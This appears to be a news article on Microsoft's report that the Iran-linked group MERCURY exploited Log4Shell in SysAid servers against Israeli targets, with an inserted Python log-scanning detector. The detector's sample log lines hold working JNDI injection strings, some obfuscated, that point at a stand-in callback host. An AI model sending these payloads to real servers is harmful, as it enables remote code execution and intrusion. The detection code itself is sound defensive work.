An Iran-backed cyber threat group is exploiting a vulnerability in Log4j 2 to target Israeli organizations, Microsoft warned Thursday.
In a new report, the Microsoft Threat Intelligence Center (MSTIC) and the Microsoft 365 Defender team say that the threat group MERCURY has exploited the Apache Log4j 2 remote code execution vulnerability (known as Log4Shell) on vulnerable SysAid server instances.
Founded in Israel in 2002, SysAid has grown into a leading provider of help desk and IT service management software. According to company information, it has over 5,000 customers and partners across organizations in 140 countries.
Microsoft researchers have previously assessed MERCURY's partnership with Iran's Ministry of Information and Security (MOIS) "with a high degree of credibility." MERCURY is also known as MuddyWater, which US Cyber Command has identified as a subordinate element within MOIS.
The group, which primarily targets other countries in the Middle East but has also targeted the United States and India, is known for tracking dissidents of the Iranian regime. It has targeted Israel for years, since it was first identified in 2017. The current attacks were observed on July 23 and 25, 2022.
“While MERCURY has used Log4j 2 exploits in the past, we have never seen this actor use a SysAid app as an initial access vector,” Microsoft’s report states.
“After gaining access, MERCURY establishes persistence, dumps credentials, and uses custom and well-known hacking tools, as well as built-in operating system tools for hands-on keyboard attacks, to move laterally through the target organization.”
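The initial access step described above, the Log4Shell lookup string arriving in an HTTP request to a Java application, leaves a trace in ordinary web-server access logs. The following is an added defensive example (not code from the article, Microsoft, or SysAid) that scans Apache/NGINX "combined" format log lines for the lookup string, first collapsing the common case-transform and default-value obfuscations so that disguised payloads are not missed. The log lines, source addresses and the 198.51.100.7 callback host are constructed sample data; the combined log format is an assumption about the target's logging configuration.

```python
"""Flag access-log lines that carry a Log4Shell-style JNDI lookup string,
including obfuscated variants, and report which client sent them."""
import re
from typing import Dict, List, Optional

# Constructed sample lines (not from the article). The User-Agent field is a
# common carrier for injected lookup strings, but request and referer are
# checked too.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Jul/2022:10:01:02 +0000] "GET /servlet/sysaid/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [23/Jul/2022:10:01:05 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"
10.0.0.9 - - [23/Jul/2022:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/a}"
10.0.0.9 - - [23/Jul/2022:10:01:09 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.7/x}"
10.0.0.12 - - [23/Jul/2022:10:01:11 +0000] "POST /api HTTP/1.1" 200 12 "-" "curl/7.68.0"
"""

# Obfuscation forms: ${lower:j}, ${upper:J}, and default-value lookups such
# as ${::-j} or ${env:NOPE:-j}, which Log4j resolves to the fallback text.
_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^{}]*)\}", re.IGNORECASE)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# After normalisation a payload reads ${jndi:<scheme>://<host>/...}
_JNDI = re.compile(r"\$\{\s*jndi:\s*([a-z]+)://([^/\s}]+)", re.IGNORECASE)
# Assumed combined log format: client IP first, request/referer/UA in quotes.
_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<request>[^"]*)" \d+ \d+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)


def normalize(payload: str, max_rounds: int = 20) -> str:
    """Collapse nested case/default lookups until the string stops changing."""
    for _ in range(max_rounds):
        new = _CASE_LOOKUP.sub(lambda m: m.group(1), payload)
        new = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), new)
        if new == payload:
            break
        payload = new
    return payload


def scan_line(line: str, lineno: int) -> Optional[Dict[str, object]]:
    """Return a hit record for one log line, or None if it looks benign."""
    m = _LINE.match(line)
    if not m:
        return None  # unparseable line; a real pipeline would count these
    for field in ("request", "referer", "ua"):
        norm = normalize(m.group(field))
        j = _JNDI.search(norm)
        if j:
            return {
                "line": lineno,
                "ip": m.group("ip"),
                "field": field,
                "scheme": j.group(1).lower(),
                "host": j.group(2),   # where the victim would call back to
                "normalized": norm,
            }
    return None


def find_log4shell_probes(log_text: str) -> List[Dict[str, object]]:
    """Scan a whole log and return every hit, in file order."""
    hits = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        hit = scan_line(line, lineno)
        if hit:
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for h in find_log4shell_probes(SAMPLE_LOG):
        print(f"line {h['line']}: {h['ip']} -> {h['scheme']}://{h['host']} "
              f"(in {h['field']}): {h['normalized']}")
```

The callback host in each hit is the value worth pivoting on: a block on outbound LDAP/RMI connections from application servers, and a search for that host in proxy and DNS logs, shows whether a probe became an actual download. Normalising before matching matters because a plain `${jndi:` signature misses the second and third sample lines entirely.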
In a report submitted to U.S. President Joe Biden last month, the Department of Homeland Security’s Cyber Safety Review Board (CSRB) addressed the ongoing risks posed by the vulnerability discovered in late 2021 in the widely used Log4j open source software library.
“The Log4j event is not over. The board has assessed Log4j as an ‘inherent vulnerability’ and vulnerable instances of Log4j will remain in systems for years to come, perhaps a decade or more. Significant risks remain,” the report said.
The identity of the targeted Israeli company and the extent of the damage are currently unknown. The Israeli National Cyber Directorate (INCD) has not commented on the specific report, and there has yet to be a general response from SysAid.
Between cyber warfare, nuclear deals and endless elections
Israel is now engaged in a diplomatic blitz to prevent a revival of the Iran nuclear deal, which appears to be imminent, or at least to be under negotiation with some changes. Regardless, cyber warfare between the two countries has intensified significantly over the past few years.
In June, Israel’s cyber chief, Gabi Portnoy, said that “Iran, along with (deputy) Hezbollah and Hamas, have become the dominant cyber rivals,” and stressed the need for a “cyber dome,” just as the “Iron Dome” system protects Israel from missiles and rockets.
Mandiant revealed in early August that it was tracking another Iran-linked group, UNC3890, which targeted Israeli shipping, government, energy, and healthcare organizations “via potential social engineering lures and watering holes.” The campaign, which has been active since at least 2020, was still ongoing when the cybersecurity firm learned of its existence.
On November 1, Israeli citizens will go to the polls to elect a new government for the fifth time in 3.5 years. Defense experts and cyber analysts are concerned that the possibility of foreign government-sponsored interference (from Iran or other countries) through fake news, social engineering campaigns and the like cannot be ruled out.